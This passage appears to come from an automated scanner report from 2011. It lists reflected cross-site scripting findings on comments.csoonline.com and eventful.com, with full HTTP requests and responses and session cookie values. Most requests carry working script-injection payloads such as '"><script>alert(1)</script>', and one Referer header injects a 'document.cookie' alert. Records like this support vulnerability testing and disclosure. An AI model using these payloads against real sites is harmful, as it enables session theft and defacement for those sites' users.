User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33622
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1359c"%3bbed5f7e89d2 was submitted in the REST URL parameter 2. This input was echoed as 1359c";bed5f7e89d2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /images/global1359c"%3bbed5f7e89d2/logo-techwords.gif HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33622
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a54a"><script>alert(1)</script>917b628f55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/8a54a"><script>alert(1)</script>917b628f55/logo-techwords.gif HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33676
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4221"><script>alert(1)</script>aa87fe73910 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/global/f4221"><script>alert(1)</script>aa87fe73910 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:32 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33643
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 409e8"%3b37e874acee2 was submitted in the REST URL parameter 3. This input was echoed as 409e8";37e874acee2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /images/global/logo-techwords.gif409e8"%3b37e874acee2 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:32 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33622
3.37. http://comments.csoonline.com/images/global/logo-techwords.gif [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://comments.csoonline.com
Path: /images/global/logo-techwords.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 281dc"-alert(1)-"b424eb1a844 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/global/logo-techwords.gif?281dc"-alert(1)-"b424eb1a844=1 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33661
3.38. http://comments.csoonline.com/images/global/logo-techwords.gif [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://comments.csoonline.com
Path: /images/global/logo-techwords.gif
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87c72"><script>alert(1)</script>8b8d6891bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/global/logo-techwords.gif?87c72"><script>alert(1)</script>8b8d6891bc=1 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; PHPSESSID=f27pf1mtv6mhneqphta2v7dv47
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 13:19:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 13:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33703
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bb24"%3b29e03e834a6 was submitted in the REST URL parameter 1. This input was echoed as 7bb24";29e03e834a6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /themes7bb24"%3b29e03e834a6/CIO.com/style.css HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 12:46:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=j29dat3qqh0a37c7bgk2pnct04; expires=Wed, 23-Mar-2011 16:19:50 GMT; path=/; domain=.comments.csoonline.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 12:46:30 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33598
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload febf8"><script>alert(1)</script>3a3399f1586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /febf8"><script>alert(1)</script>3a3399f1586/CIO.com/style.css HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 12:46:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=g6huf2ji8k7ivgb0834tshe013; expires=Wed, 23-Mar-2011 16:19:50 GMT; path=/; domain=.comments.csoonline.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 12:46:30 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33655
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c28c"><script>alert(1)</script>b30dc3701d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/3c28c"><script>alert(1)</script>b30dc3701d2/style.css HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 12:46:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=ss2e62743nmu5oe70go89phh82; expires=Wed, 23-Mar-2011 16:19:54 GMT; path=/; domain=.comments.csoonline.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 12:46:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33652
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 996fb"%3bef92d3fd080 was submitted in the REST URL parameter 2. This input was echoed as 996fb";ef92d3fd080 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /themes/CIO.com996fb"%3bef92d3fd080/style.css HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 12:46:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=410qc8ja48h0rcgs3deift28r4; expires=Wed, 23-Mar-2011 16:19:54 GMT; path=/; domain=.comments.csoonline.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 12:46:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33598
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c28b"%3b393cac47464 was submitted in the REST URL parameter 3. This input was echoed as 9c28b";393cac47464 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /themes/CIO.com/style.css9c28b"%3b393cac47464 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 12:46:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=jn2shqrq5dp3hcs074rj336d65; expires=Wed, 23-Mar-2011 16:19:58 GMT; path=/; domain=.comments.csoonline.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 12:46:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33598
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26648"><script>alert(1)</script>e48a697392 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/CIO.com/26648"><script>alert(1)</script>e48a697392 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 12:46:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=rjtg2gnus8bkklt251m06jrc34; expires=Wed, 23-Mar-2011 16:19:58 GMT; path=/; domain=.comments.csoonline.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 12:46:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33643
3.45. http://comments.csoonline.com/themes/CIO.com/style.css [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://comments.csoonline.com
Path: /themes/CIO.com/style.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ee95"><script>alert(1)</script>d863f30b9b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/CIO.com/style.css?1ee95"><script>alert(1)</script>d863f30b9b8=1 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 12:46:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=749cmu62m5348idf3potrjq6e0; expires=Wed, 23-Mar-2011 16:19:47 GMT; path=/; domain=.comments.csoonline.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 12:46:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33682
3.46. http://comments.csoonline.com/themes/CIO.com/style.css [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://comments.csoonline.com
Path: /themes/CIO.com/style.css
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4700"-alert(1)-"0f7baf53781 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themes/CIO.com/style.css?d4700"-alert(1)-"0f7baf53781=1 HTTP/1.1
Host: comments.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1
Response
HTTP/1.0 404 Not Found
Date: Mon, 28 Feb 2011 12:46:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=lcg22pp2fnudj2pm8has9cgvk5; expires=Wed, 23-Mar-2011 16:19:48 GMT; path=/; domain=.comments.csoonline.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 12:46:28 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33637
3.47. http://eventful.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://eventful.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbbef"><script>alert(1)</script>08098e07bd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?bbbef"><script>alert(1)</script>08098e07bd6=1 HTTP/1.1
Host: eventful.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
